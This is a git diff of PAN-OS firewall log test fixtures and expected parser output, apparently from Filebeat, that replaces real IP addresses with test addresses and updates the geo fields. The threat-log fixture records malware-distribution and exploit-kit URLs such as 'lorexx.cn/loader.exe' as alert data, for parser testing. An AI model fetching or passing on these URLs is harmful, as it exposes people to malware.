     {
         "@timestamp": "2021-04-07T17:41:29.000-02:00",
-        "client.address": "1.40.2.67",
-        "client.ip": "1.40.2.67",
+        "client.address": "81.2.69.193",
+        "client.ip": "81.2.69.193",
         "client.nat.ip": "7.2.2.171",
         "event.code": "gateway-getconfig",
         "event.dataset": "panw.panos",
         "event.duration": 0,
         "event.module": "panw",
-        "event.original": "1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,1.40.2.67,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"Config name: , Client region: BE.\",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0",
+        "event.original": "1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,81.2.69.193,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"Config name: , Client region: BE.\",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "fileset.name": "panos",
         "host.id": "7d01b5-f538-4fa3-a2a2-83980d1325",
-        "host.ip": "1.40.2.67",
+        "host.ip": "81.2.69.193",
         "host.name": "HOST73486",
         "host.os.family": "Windows",
         "host.os.full": "Microsoft Windows 10 Pro , 64-bit",
         "input.type": "log",
-        "log.offset": 946,
+        "log.offset": 947,
         "network.type": "ipv4",
         "observer.hostname": "GlobalProtect_GW",
         "observer.product": "PAN-OS",
@@ -227,26 +223,24 @@
             "HOST73486"
         ],
         "related.ip": [
-            "1.40.2.67",
-            "7.2.2.171"
+            "7.2.2.171",
+            "81.2.69.193"
         ],
         "related.user": [
             "pre-logon"
         ],
         "service.type": "panw",
-        "source.address": "1.40.2.67",
-        "source.as.number": 4804,
-        "source.as.organization.name": "Microplex PTY LTD",
-        "source.geo.city_name": "Seven Hills",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.777,
-        "source.geo.location.lon": 150.9373,
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "BE",
-        "source.geo.region_iso_code": "AU-NSW",
-        "source.geo.region_name": "New South Wales",
-        "source.ip": "1.40.2.67",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.nat.ip": "7.2.2.171",
         "source.user.name": "pre-logon",
         "tags": [
@@ -272,7 +266,7 @@
         "host.ip": "0.0.0.0",
         "host.name": "HOSTP92413",
         "input.type": "log",
-        "log.offset": 1307,
+        "log.offset": 1310,
         "network.type": "ipv4",
         "observer.hostname": "GlobalProtect_GW",
         "observer.product": "PAN-OS",
@@ -328,7 +322,7 @@
         "host.os.family": "Windows",
         "host.os.full": "Microsoft Windows 10 Enterprise, 64-bit",
         "input.type": "log",
-        "log.offset": 1641,
+        "log.offset": 1644,
         "network.type": "ipv4",
         "observer.hostname": "GP GW intern",
         "observer.product": "PAN-OS",
@@ -373,71 +367,6 @@
         ],
         "user.name": "maxmustermann"
     },
-    {
-        "@timestamp": "2021-03-02T11:01:02.000-02:00",
-        "client.address": "10.20.30.40",
-        "client.ip": "10.20.30.40",
-        "client.nat.ip": "123.123.123.123",
-        "event.code": "gateway-setup-ipsec",
-        "event.dataset": "panw.panos",
-        "event.duration": 0,
-        "event.module": "panw",
-        "event.original": "1,2021/03/02 11:01:03,123456789999,GLOBALPROTECT,0,2305,2021/03/02 11:01:02,vsys1,gateway-setup-ipsec,tunnel,,IPSec,domain\\musterman,DE,Rechner123,123.123.123.123,0.0.0.0,10.20.30.40,0.0.0.0,96c43d47-8bb5-4f78-8dfc-413a189a29e0,SERIALNR,5.1.1,Windows,\"Microsoft Windows 10 Enterprise, 64-bit\",1,,,,success,,0,,0,GPGateway,6894571632887761989,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,",
-        "event.outcome": "success",
-        "event.timezone": "-02:00",
-        "fileset.name": "panos",
-        "host.id": "96c43d47-8bb5-4f78-8dfc-413a189a29e0",
-        "host.ip": "10.20.30.40",
-        "host.name": "Rechner123",
-        "host.os.family": "Windows",
-        "host.os.full": "Microsoft Windows 10 Enterprise, 64-bit",
-        "input.type": "log",
-        "log.offset": 2058,
-        "network.type": "ipv4",
-        "observer.hostname": "GPGateway",
-        "observer.product": "PAN-OS",
-        "observer.serial_number": "123456789999",
-        "observer.type": "firewall",
-        "observer.vendor": "Palo Alto Networks",
-        "panw.panos.actionflags": "0x8000000000000000",
-        "panw.panos.client_ver": "5.1.1",
-        "panw.panos.error_code": "0",
-        "panw.panos.priority": "manual only",
-        "panw.panos.repeatcnt": 1,
-        "panw.panos.response_time": "0",
-        "panw.panos.sequence_number": 6894571632887761989,
-        "panw.panos.serial_number": "SERIALNR",
-        "panw.panos.source.nat.ip": "123.123.123.123",
-        "panw.panos.stage": "tunnel",
-        "panw.panos.sub_type": "0",
-        "panw.panos.tunnel_type": "IPSec",
-        "panw.panos.type": "GLOBALPROTECT",
-        "panw.panos.virtual_sys": "vsys1",
-        "related.hosts": [
-            "GPGateway",
-            "Rechner123"
-        ],
-        "related.ip": [
-            "10.20.30.40",
-            "123.123.123.123"
-        ],
-        "related.user": [
-            "musterman"
-        ],
-        "service.type": "panw",
-        "source.address": "10.20.30.40",
-        "source.geo.name": "DE",
-        "source.ip": "10.20.30.40",
-        "source.nat.ip": "123.123.123.123",
-        "source.user.domain": "domain",
-        "source.user.name": "musterman",
-        "tags": [
-            "forwarded",
-            "pan-os"
-        ],
-        "user.domain": "domain",
-        "user.name": "musterman"
-    },
     {
         "@timestamp": "2021-03-02T09:39:26.000-02:00",
         "client.address": "0.0.0.0",
@@ -566,7 +495,7 @@
         "user.name": "maxmustermann"
     },
     {
-        "@timestamp": "2021-10-22T16:10:05.000Z",
+        "@timestamp": "2021-10-22T14:10:05.000-02:00",
         "client.address": "10.2.2.2",
         "client.ip": "10.2.2.2",
         "client.nat.ip": "10.1.1.1",
@@ -624,7 +553,7 @@
         "user.name": "host"
     },
     {
-        "@timestamp": "2021-11-09T21:45:14.000Z",
+        "@timestamp": "2021-11-09T19:45:14.000-02:00",
         "client.address": "10.4.4.4",
         "client.ip": "10.4.4.4",
         "client.nat.ip": "10.3.3.3",
@@ -682,7 +611,7 @@
         "user.name": "user"
     },
     {
-        "@timestamp": "2021-11-09T21:45:14.000Z",
+        "@timestamp": "2021-11-09T19:45:14.000-02:00",
         "event.code": "gateway-tunnel-latency",
         "event.dataset": "panw.panos",
         "event.duration": 0,
diff --git a/x-pack/filebeat/module/panw/panos/test/hipmatch.log b/x-pack/filebeat/module/panw/panos/test/hipmatch.log
index 26bd6dd14d45..1341b080d500 100644
--- a/x-pack/filebeat/module/panw/panos/test/hipmatch.log
+++ b/x-pack/filebeat/module/panw/panos/test/hipmatch.log
@@ -1,2 +1,2 @@
 1,2021/03/02 10:06:31,12345678999,HIPMATCH,0,2305,2021/03/02 10:06:25,domain\mustermanm,vsys1,PC12345,,10.20.30.40,GlobalProtect 5.1.1,1,object,0,0,6894571641485024543,0x8000000000000000,267,24,19,0,,de-firewall,1,0.0.0.0,d275bcbe-3a07-4e69-85c5-3ad9192c212e,F0S48Y2,,1970-01-01T01:00:00.000+01:00
-1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,67.240.185.235,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH
+1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,89.160.20.112,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH
diff --git a/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json b/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json
index 7df8f3a551ca..ff2a2a307d86 100644
--- a/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json
@@ -56,10 +56,10 @@
     },
     {
         "@timestamp": "2019-10-09T10:20:15.000-02:00",
-        "client.ip": "67.240.185.235",
+        "client.ip": "89.160.20.112",
         "event.dataset": "panw.panos",
         "event.module": "panw",
-        "event.original": "1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,67.240.185.235,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH",
+        "event.original": "1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,89.160.20.112,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "fileset.name": "panos",
@@ -93,24 +93,24 @@
             "oh-C02ABCDEFGH4"
         ],
         "related.ip": [
-            "67.240.185.235"
+            "89.160.20.112"
         ],
         "related.user": [
             "ira"
         ],
         "service.type": "panw",
-        "source.address": "67.240.185.235",
-        "source.as.number": 11351,
-        "source.as.organization.name": "Charter Communications Inc",
-        "source.geo.city_name": "Portland",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 43.6598,
-        "source.geo.location.lon": -70.2547,
-        "source.geo.region_iso_code": "US-ME",
-        "source.geo.region_name": "Maine",
-        "source.ip": "67.240.185.235",
+        "source.address": "89.160.20.112",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.user.name": "ira",
         "tags": [
             "forwarded",
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log
index 421c6f796a6c..4cd75721c32d 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log
@@ -31,4 +31,4 @@ Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json
index 173cdec4dd8c..e19ca378b844 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json
@@ -732,19 +732,15 @@
         "client.packets": 1,
         "client.port": 59309,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -757,7 +753,7 @@
         "event.end": "2012-04-10T04:39:56.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:56.000-02:00",
         "event.timezone": "-02:00",
@@ -772,7 +768,7 @@
         "log.offset": 5853,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=",
+        "network.community_id": "1:tf34cPo413Ta9avfHZIP6b5DHXc=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -804,14 +800,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log
index b493a709848f..fff6477c1e40 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log
@@ -1,100 +1,100 @@
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11&parameter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
-Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
